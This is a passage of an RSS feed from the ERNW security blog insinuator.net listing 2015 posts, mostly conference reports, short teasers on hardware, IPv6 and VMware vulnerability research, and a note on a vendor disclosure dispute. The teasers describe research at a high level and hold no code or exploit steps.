      <description>&lt;p&gt;During my stay in The Hague I needed to print something, so I asked for a Copy shop and this is where they sent me:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/coffeeshop.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/coffeeshop-300x225.jpg&#34; alt=&#34;coffeeshop&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Against the common rule to just talk about the personal favorites, I will cover all talks in one, two or more sentences (arbitrarily decided while writing). This also gives you a broader picture of the conference.&lt;/p&gt;&#xA;&lt;p&gt;Jumping right in with the keynote of Day 1 by Jon Callas and my favorite quote “Make your devices fixable”. Enough said.&lt;/p&gt;</description>
    </item>
    <item>
      <title>hardwear.io: Conference Day 2</title>
      <link>https://insinuator.net/2015/10/hardwear.io-conference-day-2/</link>
      <pubDate>Sat, 10 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/hardwear.io-conference-day-2/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/politie_logo.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/politie_logo.jpg&#34; alt=&#34;stolen off the internet&#34;&gt;&lt;/a&gt;Netherlands Police is called Politie because they’re so polite. (works only if you suffer from dyslexia)&lt;/p&gt;&#xA;&lt;p&gt;[ picture stolen from the &lt;a href=&#34;https://www.politie.nl/&#34;&gt;polite politie&lt;/a&gt; ]&lt;/p&gt;&#xA;&lt;p&gt;Unlike the German Oktoberfest in Munich which already started in September, the Oktoberfest in The Hague started on 2nd October.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/oktoberfest.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/oktoberfest-300x225.jpg&#34; alt=&#34;oktoberfest&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;In spite of this competing event the decision going to the last day of the hardwear.io Conference definitely paid off.&lt;/p&gt;&#xA;&lt;p&gt;Day 2 started with the Keynote from Harald Welte (the father of Osmocom) and his view about Telecom Security for the last few years. His observation is that nothing has changed so far – we still suffer from a lack of tools and monoculture throughout the industry.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW speaking @ hardwear.io</title>
      <link>https://insinuator.net/2015/10/ernw-speaking-@-hardwear.io/</link>
      <pubDate>Mon, 05 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/ernw-speaking-@-hardwear.io/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/hardwarebug-266x300.png&#34; alt=&#34;Hardwarebug&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;On October 1st and 2nd Flo and I were presenting at&lt;br&gt;&#xA;hardwear.io in The Hague, NL. My topic was “&lt;a href=&#34;https://www.ernw.de/download/ERNW_hardwear.io_2015_living_in_a_fools_wireless-secured_paradise_skiese.pdf&#34;&gt;Living in a fool’s&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;https://www.ernw.de/download/ERNW_hardwear.io_2015_living_in_a_fools_wireless-secured_paradise_skiese.pdf&#34;&gt;wireless-secured paradise&lt;/a&gt;” and Flo was presenting his current research&lt;br&gt;&#xA;on medical device security. It was the first talk at an international&lt;br&gt;&#xA;security conference for me and I am still quite excited!&lt;/p&gt;&#xA;&lt;p&gt;I was speaking about the (in)security of wireless consumer alarm&lt;br&gt;&#xA;systems, which you can buy just in every consumer electronics store&lt;br&gt;&#xA;around the corner for about $10 – $250. I analyzed the systems on&lt;br&gt;&#xA;different levels, e.g. looking at UART and JTAG and the wireless domain&lt;br&gt;&#xA;with Software Defined Radio (SDR). I gave an overview of my current&lt;br&gt;&#xA;research and the tools I usually use for hardware hacking, especially my&lt;br&gt;&#xA;favorite thing to play with: SDR.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them</title>
      <link>https://insinuator.net/2015/10/the-strange-case-of-some_software-adding-an-ipv6-extension-header-and-an-internet-router-dropping-them/</link>
      <pubDate>Mon, 05 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/the-strange-case-of-some_software-adding-an-ipv6-extension-header-and-an-internet-router-dropping-them/</guid>
      <description>&lt;p&gt;Last week Christopher and I were the instructors of &lt;a href=&#34;http://www.hmtrainingsolutions.com/de/1-seminar/87-ipv6-in-enterprise-networks141205170415.html&#34;&gt;an IPv6 workshop&lt;/a&gt;. In this one we usually build a lab with the participants incl. a variety of routed segments and native IPv6 Internet access. Once the latter part is implemented people start poking around and surfing the Internet from their laptops, not least to find out which sites they can actually reach from an v6-only network (please note that actually &lt;a href=&#34;http://w3techs.com/technologies/breakdown/ce-ipv6/ranking&#34;&gt;there are many&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Being at VB2015…</title>
      <link>https://insinuator.net/2015/10/being-at-vb2015/</link>
      <pubDate>Fri, 02 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/being-at-vb2015/</guid>
      <description>&lt;p&gt;I am currently at the 25th &lt;a href=&#34;https://www.virusbtn.com/index&#34;&gt;Virus Bulletin International Conference&lt;/a&gt; in Prague. The VB2015 is hosted by the Virus Bulletin portal and provides three full days of learning opportunities and networking.&lt;/p&gt;&#xA;&lt;p&gt;VB2015 focuses on the key themes:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Malware &amp;amp; botnets&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Anti-malware tools &amp;amp; techniques&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Mobile devices&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Hacking &amp;amp; vulnerabilities&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Spam &amp;amp; social networks&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Network security&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;&lt;strong&gt;General Observations:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;What I liked about VB2015 was the very friendly and always helpful staff. The good conference location, it never felt overcrowded or to empty and the very good catering during the conference.&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMware did it again: vCenter Remote Code Execution</title>
      <link>https://insinuator.net/2015/10/vmware-did-it-again-vcenter-remote-code-execution/</link>
      <pubDate>Fri, 02 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/vmware-did-it-again-vcenter-remote-code-execution/</guid>
      <description>&lt;p&gt;Yesterday 7Elements released &lt;a href=&#34;https://www.7elements.co.uk/resources/blog/cve-2015-2342-remote-code-execution-within-vmware-vcenter/&#34;&gt;the description&lt;/a&gt; of a Remote Code Execution vulnerability in VMware vCenter. The information came in at a good point as I’m at the moment drafting a follow-up blogpost for &lt;a href=&#34;https://www.insinuator.net/2014/01/state-of-virtualization-security-14/&#34;&gt;this one&lt;/a&gt; which will summarize some of our approaches to virtualization security. The vCenter vulnerability is both quite critical and particularly interesting in several ways:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Once there is proper network isolation &amp;amp; restriction, the vulnerability should not be exploitable from the overall corporate network (or maybe even the Internet — a quick inaccurate shodan search for “vcenter” returned about 1800 results and at random checks actually revealed vCenter systems). It should also not be exploitable from ESXi hosts managed through the vCenter: ESXi hosts need to be able to connect to the vCenter for heartbeat messages, however “only” on ports 443 and 902 — the vulnerability exploits a service running on TCP ports &lt;a href=&#34;http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&amp;amp;cmd=displayKC&amp;amp;externalId=2051575&#34;&gt;9875 – 9877&lt;/a&gt;.&lt;/li&gt;&#xA;&lt;li&gt;It is questionable whether the exploited Java RMI functionality is really required for the operation of VMware infrastructures. This &lt;a href=&#34;http://www.accuvant.com/blog/exploiting-jmx-rmi&#34;&gt;blogpost&lt;/a&gt; provides further detail on the known type of vulnerability in Java applications. VMware had a similar issue back in 2010, where &lt;a href=&#34;http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&amp;amp;cmd=displayKC&amp;amp;externalId=1034175&#34;&gt;their workaround&lt;/a&gt; to fix a vulnerability was to just disable the affected component, resulting in the impression that it wasn’t even required in the first place. Let’s see whether the future will bring up more vulnerabilities which could have been prevented by implementing more thorough hardening of all components (e.g. following the &lt;em&gt;minimal machine&lt;/em&gt; principle). Furthermore in 2011 there was a similar 3^(rd) party component vulnerability in vCenter which we covered &lt;a href=&#34;https://www.insinuator.net/2011/03/vmsa-2011-0005-vmware-vcenter-orchestrator-remote-code-execution-vulnerability/&#34;&gt;in this blogpost&lt;/a&gt;. The totality of our posts on VMware security can be found &lt;a href=&#34;https://www.insinuator.net/tag/vmware/&#34;&gt;here&lt;/a&gt;.&lt;/li&gt;&#xA;&lt;li&gt;For high-security environments we have been recommending for some time to use a dedicated vCenter per hypervisor cluster (i.e. if you have two hypervisor clusters, one for internal and one for DMZ systems, you should use two separate vCenter systems). Vulnerabilities like these illustrate the need for that, given that the ESXi hosts need to be able to access the vCenter on the network level.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Happy patching &amp;amp; stay tuned,&lt;/p&gt;</description>
    </item>
    <item>
      <title>BlackHoodie: Reversing Workshop for Women</title>
      <link>https://insinuator.net/2015/09/blackhoodie-reversing-workshop-for-women/</link>
      <pubDate>Tue, 29 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/blackhoodie-reversing-workshop-for-women/</guid>
      <description>&lt;p&gt;In the beginning of September, I had an opportunity to take part in BlackHoodie – a reversing workshop for women organized by Marion Marschalek, senior malware researcher at Cyphort, Inc. It took place on 5th and 6th of September at University of Applied Sciences St. Pölten, Austria.&lt;/p&gt;&#xA;&lt;p&gt;Besides me, 14 more young women from different countries came to attend the workshop; the overall atmosphere was very friendly and productive. Before the actual event all participants were getting preparatory assignments and recommendations (not to spend our two days on learning the very basics), and during the workshop itself we got our hands on analyzing and reversing some actual malware samples. I personally found it very interesting how one can detect and overcome several layers of anti-analysis protection. I left the workshop excited and packed with some new knowledge as a basis for further skills development – it’s just the beginning! 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Python For Hackers</title>
      <link>https://insinuator.net/2015/09/python-for-hackers/</link>
      <pubDate>Tue, 29 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/python-for-hackers/</guid>
      <description>&lt;p&gt;Python has reached a defacto standard in exploit development lifecycles and most of the proof of concept tools you’ll find out there are written in Python (besides the metasploit framework, which is written in Ruby). Python allows to write scripts handling with remote services, fiddling with binary data and interacting with C libraries (or Java in case of Jython/.Net in IronPython) in a fast and easy way. The huge standard library with it’s “battery included” principle removes some of the dependency hell known from other frameworks/languages. I want to share some of my python coding experiences with you, and maybe this could give some helpful tips for your future work, to make the world a bit safer 🙂 (PS: most of the examples are written in Python 3.x or compatible to both Python branches).&lt;/p&gt;</description>
    </item>
    <item>
      <title>New iOS Version – New Lockscreen Bypass</title>
      <link>https://insinuator.net/2015/09/new-ios-version-new-lockscreen-bypass/</link>
      <pubDate>Sun, 27 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/new-ios-version-new-lockscreen-bypass/</guid>
      <description>&lt;p&gt;At the 16th of September Apple released its new version of the mobile operating system iOS 9. As several versions before, this new iteration suffers from a weakness that makes it possible to bypass the lockscreen without entering the respective PIN code. Exploiting this flaw requires Siri to be enabled and phyiscal access to the phone. A successful exploitation results in a major loss of confidentiality as all photos and contacts in the phonebook can be accessed by the attacker. The following steps lead to the lockscreen bypass:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reminiscing About Black Hat USA 2015</title>
      <link>https://insinuator.net/2015/09/reminiscing-about-black-hat-usa-2015/</link>
      <pubDate>Mon, 21 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/reminiscing-about-black-hat-usa-2015/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/09/IMG_0245.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/09/IMG_0245.jpg&#34; alt=&#34;The Strip&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;While searching for some photos for my last &lt;a href=&#34;https://www.insinuator.net/2015/09/miners-canary-revival-in-it-security/&#34;&gt;blog post on Thinkst Canary&lt;/a&gt; I found a couple more from our recent trip to &lt;a href=&#34;https://www.blackhat.com/us-15/&#34;&gt;Black Hat USA&lt;/a&gt; and &lt;a href=&#34;https://defcon.org/html/links/dc-archives/dc-23-archive.html&#34;&gt;DEF CON&lt;/a&gt;, which I consider worth sharing. Nothing too technical, just some visual impressions and comments from my side. Let’s get it on!&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/09/signup.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/09/signup.jpg&#34; alt=&#34;Sign Up&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;My colleague Patrik and myself arrived one day early before the briefings and headed right to Mandalay Bay to check out the Black Hat venue and get a feel for the city. The sheer size of just everything is mind-blowing.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Miner’s Canary Revival in IT Security</title>
      <link>https://insinuator.net/2015/09/miners-canary-revival-in-it-security/</link>
      <pubDate>Sat, 19 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/miners-canary-revival-in-it-security/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/09/canary_credit_to_javier_bano-300x201.jpg&#34; alt=&#34;canary_credit_to_javier_bano&#34;&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;what-is-a-miners-canary&#34;&gt;What is a Miner’s Canary?&lt;/h3&gt;&#xA;&lt;p&gt;Well, it’s a canary (these cute yellow songbirds some people have as a pet), and its main feature is that &lt;em&gt;it dies before you will&lt;/em&gt;.&lt;/p&gt;&#xA;&lt;p&gt;What the hack [pun intended]? And by the way… what has this to do with IT Security? Well… let me first quote Wikipedia on the birds:&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;“Canaries were once regularly used in coal mining as an early warning system. Toxic gases such as carbon monoxide, methane or carbon dioxide in the mine would kill the bird before affecting the miners. Signs of distress from the bird indicated to the miners that conditions were unsafe.” Source: &lt;a href=&#34;https://en.wikipedia.org/wiki/Domestic_canary#Miner.27s_canary&#34;&gt;https://en.wikipedia.org/wiki/Domestic_canary#Miner.27s_canary&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6@MRMCD2015</title>
      <link>https://insinuator.net/2015/09/ipv6@mrmcd2015/</link>
      <pubDate>Mon, 14 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/ipv6@mrmcd2015/</guid>
      <description>&lt;p&gt;Greetings everyone,&lt;/p&gt;&#xA;&lt;p&gt;On Saturday last week I had the pleasure of delivering a &lt;a href=&#34;https://mrmcd.net/2015/fahrplan/events/7045.html&#34;&gt;workshop on IPv6 networking&lt;/a&gt; at the &lt;a href=&#34;https://mrmcd.net/&#34;&gt;MRMCD2015&lt;/a&gt; conference in Darmstadt, Germany. It goes without saying that the atmosphere was quite amicable; as usual at CCC-related events. What definitely impressed me the most was the diversity of the audience. There were around thirty attendees representing several age groups and all with seemingly differing backgrounds.&lt;/p&gt;&#xA;&lt;p&gt;The engagement of everyone was stunning. I questioned the most engaged attendees relentlessly and they fired back. I was being constantly bombarded with questions from enthusiastic geeks and they got, hopefully, what they deserved. This provided for a great learning environment, a friendly atmosphere and in my humble opinion really constructive dialogues. Well, one has to be interested and enthusiastic in order to spend three hours on a rainy Saturday evening discussing IPv6.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sending Mixed Signals – What Can Happen in the Course of Vulnerability Disclosure</title>
      <link>https://insinuator.net/2015/09/sending-mixed-signals-what-can-happen-in-the-course-of-vulnerability-disclosure/</link>
      <pubDate>Thu, 10 Sep 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/09/sending-mixed-signals-what-can-happen-in-the-course-of-vulnerability-disclosure/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Given there’s quite some speculation and, as we think, misinformation going around we think it’s helpful to add/clarify the following information:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;we fully comply with the injunction and we have no intentions to violate it. we do not plan to publish any technical information besides the report (agreed upon with FireEye themselves) and the slides (based on the former) anyway. No 3rd parties except for the ones involved (FireEye, lawyers) have received any additional technical information from our side, let alone an earlier version of the report.&lt;/li&gt;&#xA;&lt;li&gt;the injunction covers accompanying details mostly within the architecture space, but not the core vulnerabilities themselves. Those are not part of the injunction.&lt;/li&gt;&#xA;&lt;li&gt;we stand by the timeline as provided below. In particular, the following two points:&lt;br&gt;&#xA;– FireEye received a draft version of the report which had the objectionable material (as identified by the cease and desist letter) fully removed on August 11th.&lt;br&gt;&#xA;– according to the cease and desist letter FireEye’s lawyer sent us, they were informed – from our side – about the planned talk at 44CON on Jul 23rd.&lt;/li&gt;&#xA;&lt;li&gt;there’s an injunction, but not a lawsuit. I used the term “sue” after consulting &lt;a href=&#34;http://www.merriam-webster.com/dictionary/sue&#34;&gt;Merriam-Webster&lt;/a&gt; which states: “sue: to seek justice or right from (a person) by legal process”, but this might have been misinterpreted by some readers. As stated, there’s a pending injunction, but not a lawsuit.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Please note that we won’t share legal documents with 3rd parties or publish them as we consider this inappropriate.&lt;br&gt;&#xA;Please note further that, during the whole process, our goal was to perform a responsible disclosure procedure with its inherent objectives (namely vulnerability remediation by vendor and education of various stakeholders involved, see also &lt;a href=&#34;https://www.ernw.de/download/ERNW_Newsletter_50_Vulnerability_Disclosure_Reflections_CaseStudy.pdf&#34;&gt;here&lt;/a&gt; or &lt;a href=&#34;https://www.insinuator.net/2015/07/reflections-on-vulnerability-disclosure/&#34;&gt;here&lt;/a&gt;). We consider this disclosure process as concluded. We don’t see a need to add technical details from our side as we feel that the objectives of responsible disclosure are met (not least as patches are released since quite some time and both &lt;a href=&#34;https://www.fireeye.com/content/dam/fireeye-www/support/pdfs/fireeye-ernw-vulnerability.pdf&#34;&gt;vendor&lt;/a&gt; &amp;amp; finder have released reports).&lt;/p&gt;</description>
    </item>
    <item>
      <title>24th USENIX Security Symposium &amp;amp; WOOT Workshop</title>
      <link>https://insinuator.net/2015/08/24th-usenix-security-symposium-amp-woot-workshop/</link>
      <pubDate>Fri, 28 Aug 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/08/24th-usenix-security-symposium-amp-woot-workshop/</guid>
      <description>&lt;p&gt;Recently I had the pleasure to attend the 24th USENIX Security Symposium and its co-located Workshop on Offensive Technologies (WOOT) in Washington, D.C. The workshop has received quite some attention this year, 57 submissions of which 19 have been accepted, so that the organizers decided to double its length from one to two days.&lt;/p&gt;&#xA;&lt;p&gt;The first day of the workshop began with an excellent keynote by Adam Langley, in which he reflected on the current state of SSL/TLS and its vulnerabilities. As a side remark he mentioned that to tackle the everlasting problem of such vulnerabilities to occur, research should be performed with a much higher level of abstraction rather than focusing on the exact details of a “certain hash function of some specific CBC cipher”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cisco and the Maintenance Operation Protocol (MOP)</title>
      <link>https://insinuator.net/2015/08/cisco-and-the-maintenance-operation-protocol-mop/</link>
      <pubDate>Tue, 25 Aug 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/08/cisco-and-the-maintenance-operation-protocol-mop/</guid>
      <description>&lt;p&gt;Howdy,&lt;/p&gt;&#xA;&lt;p&gt;this is a short write up about the Maintenance Operation Protocol (MOP), an ancient remote management protocol from the &lt;a href=&#34;https://de.wikipedia.org/wiki/DECnet&#34;&gt;DECnet&lt;/a&gt; protocol suite. It’s old, rarely used and in most cases not needed at all. But as we stumbled across this protocol in some network assessments, it seems like a lot of network admins and other users don’t know about it. Even various hardening guides we’ve seen don’t mention MOP at all.&lt;/p&gt;</description>
    </item>
    <item>
      <title>KNX Support for Nmap</title>
      <link>https://insinuator.net/2015/08/knx-support-for-nmap/</link>
      <pubDate>Sun, 09 Aug 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/08/knx-support-for-nmap/</guid>
      <description>&lt;p&gt;Hi folks,&lt;/p&gt;&#xA;&lt;p&gt;our home automation research, especially with KNX, is still in progress. As part of this research we’ve implemented various tools to easy the process of identifying and enumerating KNX devices, in both IP driven networks and on the bus.&lt;/p&gt;&#xA;&lt;p&gt;Lately we’ve written two Nmap NSE scripts to discover KNXnet/IP gateways. These allow everyone to discover such gateways in local and remote networks and print some useful information about them. One of them follows the specification to discover gateways by sending multicast packets, where all devices on the network must respond to. Due to the specification of KNXnet/IP this process is rather non-invasive because only a single UDP packet is needed to discover multiple gateways. The other script allows to identify gateways via unicast connections by a slightly different message type, which allows discovery over e.g. the Internet.&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackRF meets PortaPack H1</title>
      <link>https://insinuator.net/2015/08/hackrf-meets-portapack-h1/</link>
      <pubDate>Sat, 08 Aug 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/08/hackrf-meets-portapack-h1/</guid>
      <description>&lt;p&gt;Today we received a few &lt;a href=&#34;http://www.sharebrained.com/2014/05/28/portapack-h1-imminent/&#34;&gt;ShareBrained Technology – PortaPack H1&lt;/a&gt; to use with our HackRFs. Having done a first few minutes of scanning, I just wanted to give you a quick overview of its features and potential…&lt;/p&gt;&#xA;&lt;p&gt;After having had &lt;a href=&#34;https://www.troopers.de/events/speaker/31_michael_ossmann/&#34;&gt;Michael Ossmann&lt;/a&gt; in for a few workshops with his &lt;a href=&#34;https://www.insinuator.net/2013/08/hack-rf/&#34;&gt;Jawbreaker&lt;/a&gt; and &lt;a href=&#34;https://www.insinuator.net/2014/08/hackrf-one-the-story-continues/&#34;&gt;HackRF One&lt;/a&gt; we have used the HackRF on multiple occasions. No matter if &lt;a href=&#34;https://www.insinuator.net/2015/04/analysis-of-an-alarm-system/&#34;&gt;research projects&lt;/a&gt; or actual customer projects, the HackRF has always been of great help. As we mainly use it on laptops, we’ve got certain constraints concerning its portability when wanting to do some quick mobile scanning. Although there are a few solutions for tablets and smartphones, they haven’t been quite able to convince all of us. So a while back we decided to keep an eye on the &lt;a href=&#34;http://www.sharebrained.com/2014/05/28/portapack-h1-imminent/&#34;&gt;PortaPack&lt;/a&gt; and have been since been waiting for its release.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Black Hat Talks &amp; Papers related to Windows/Active Directory Security</title>
      <link>https://insinuator.net/2015/08/black-hat-talks-papers-related-to-windows/active-directory-security/</link>
      <pubDate>Fri, 07 Aug 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/08/black-hat-talks-papers-related-to-windows/active-directory-security/</guid>
      <description>&lt;p&gt;This year’s Black Hat US saw a number of quite interesting talks in the context of Windows or Active Directory Security. For those of you too lazy to search for themselves 😉 and for our own Windows/AD Sec team (who couldn’t send anyone to Vegas due to heavy project load) I’ve compiled a little list of those.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://twitter.com/pdjstone&#34;&gt;Paul Stone&lt;/a&gt; &amp;amp; &lt;a href=&#34;https://twitter.com/NoxrNet&#34;&gt;Alex Chapman&lt;/a&gt;: WSUSPect – Compromising the Windows Enterprise via Windows Update&lt;br&gt;&#xA;Slides &lt;a href=&#34;https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf&#34;&gt;here&lt;/a&gt;.&lt;br&gt;&#xA;Whitepaper &lt;a href=&#34;http://www.contextis.com/media/documents/CTX_WSUSpect_White_Paper.pdf&#34;&gt;here&lt;/a&gt;. (Attention: on the BH website there’s an older this. the above link leads to the latest one).&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Hackers Meeting @ IETF 93 in Prague</title>
      <link>https://insinuator.net/2015/07/ipv6-hackers-meeting-@-ietf-93-in-prague/</link>
      <pubDate>Wed, 29 Jul 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/07/ipv6-hackers-meeting-@-ietf-93-in-prague/</guid>
      <description>&lt;p&gt;After the &lt;a href=&#34;http://www.insinuator.net/2013/08/ipv6-hackers-meeting-ietf-87-in-berlin-slides/&#34;&gt;first “IPv6 Hackers Meeting”&lt;/a&gt; held two years ago in Berlin, &lt;a href=&#34;https://twitter.com/FernandoGont&#34;&gt;Fernando Gont&lt;/a&gt; kindly organized a &lt;a href=&#34;http://www.ipv6hackers.org/home&#34;&gt;similar event in Prague&lt;/a&gt; last week.&lt;/p&gt;&#xA;&lt;p&gt;Although a bit on short notice it was a good meeting with interesting discussions. I contributed with shortened versions of two talks we had delivered in the past:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;the “&lt;a href=&#34;https://www.ernw.de/download/Atlasis_Rey_Schaefer_IETF93_IPv6Hackers_Evasion_of_HighEnd_IPS_Devices.pdf&#34;&gt;Evasion of High-End IDPS Devices at the IPv6 Era&lt;/a&gt;” talk which &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios&lt;/a&gt;, Rafael and I had given at Black Hat US &amp;amp; Europe 2014. The accompanying white paper with the exact details &lt;a href=&#34;https://www.ernw.de/download/eu-14-Atlasis-Rey-Schaefer-briefings-Evasion-of-HighEnd-IPS-Devices-wp.pdf&#34;&gt;can be found here&lt;/a&gt;; the tool Chiron &lt;a href=&#34;http://www.secfu.net/tools-scripts/&#34;&gt;here&lt;/a&gt; (and a tutorial &lt;a href=&#34;https://www.ernw.de/download/Chiron_Tutorial.pdf&#34;&gt;here&lt;/a&gt;).&lt;/li&gt;&#xA;&lt;li&gt;the “MLD Considered Harmful” talk that Antonios, &lt;a href=&#34;https://twitter.com/anantary&#34;&gt;Jayson&lt;/a&gt; and I had presented at the &lt;a href=&#34;https://www.troopers.de/events/troopers15/322_ipv6_security_summit/&#34;&gt;Troopers IPv6 Security Summit 2015&lt;/a&gt;. The mentioned Internet-Draft on MLD security which &lt;a href=&#34;https://www.vyncke.org/ipv6status/&#34;&gt;Eric Vyncke&lt;/a&gt;, Antonios and myself are working on can be &lt;a href=&#34;https://tools.ietf.org/html/draft-vyncke-pim-mld-security-00&#34;&gt;found here&lt;/a&gt;. We’re happy to receive any feedback on that one.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Special thanks go to &lt;a href=&#34;http://www.internetsociety.org/who-we-are/staff/mr-jan-%C5%BEor%C5%BE&#34;&gt;Jan Zorz&lt;/a&gt; and to &lt;a href=&#34;http://www.nic.cz/&#34;&gt;CZ.NIC&lt;/a&gt; for hosting us and providing refreshments. Much appreciated, guys!&lt;/p&gt;</description>
    </item>
    <item>
      <title>RedStar OS Watermarking</title>
      <link>https://insinuator.net/2015/07/redstar-os-watermarking/</link>
      <pubDate>Thu, 16 Jul 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/07/redstar-os-watermarking/</guid>
      <description>&lt;p&gt;During the last few months information about one of North Koreas operating systems was leaked. It is a Linux based OS that tries to simulate the look and feel of a Mac. Some of it’s features have already been discussed on &lt;a href=&#34;https://www.northkoreatech.org/2014/12/30/red-star-3-0-desktop-finally-becomes-public/&#34; title=&#34;rs desktop&#34;&gt;various&lt;/a&gt; &lt;a href=&#34;https://www.northkoreatech.org/2014/01/31/north-koreas-red-star-os-goes-mac/&#34; title=&#34;rs mac&#34;&gt;blog&lt;/a&gt; &lt;a href=&#34;http://www.openingupnorthkorea.com/downloads-2&#34; title=&#34;rs download&#34;&gt;posts&lt;/a&gt; and news &lt;a href=&#34;http://www.golem.de/news/red-star-ausprobiert-das-linux-aus-nordkorea-1501-111443-3.html&#34; title=&#34;golem rs&#34;&gt;articles&lt;/a&gt;. We thought we would take a short look at the OS. This blog post contains some of the results.&lt;/p&gt;&#xA;&lt;p&gt;As you can imagine, most interesting for us was to investigate features that impact the privacy of the users. There are some &lt;a href=&#34;http://www.openwall.com/lists/oss-security/2015/01/09/1&#34; title=&#34;sec vuln rs&#34;&gt;publications concerning the security&lt;/a&gt; of the OS, this is an aspect that we will not cover in this post. We will stick to a privacy issue that we identified in this post. As ERNW has a long history of “Making the World a Safer Place”, we consider this topic an important one. The privacy of potential users (especially from North Korea) may be impacted and therefore we think that the results must be made available for the public. So, here we go …&lt;/p&gt;</description>
    </item>
    <item>
      <title>Solving sound issues when using WebEx with Linux and Firefox</title>
      <link>https://insinuator.net/2015/07/solving-sound-issues-when-using-webex-with-linux-and-firefox/</link>
      <pubDate>Wed, 15 Jul 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/07/solving-sound-issues-when-using-webex-with-linux-and-firefox/</guid>
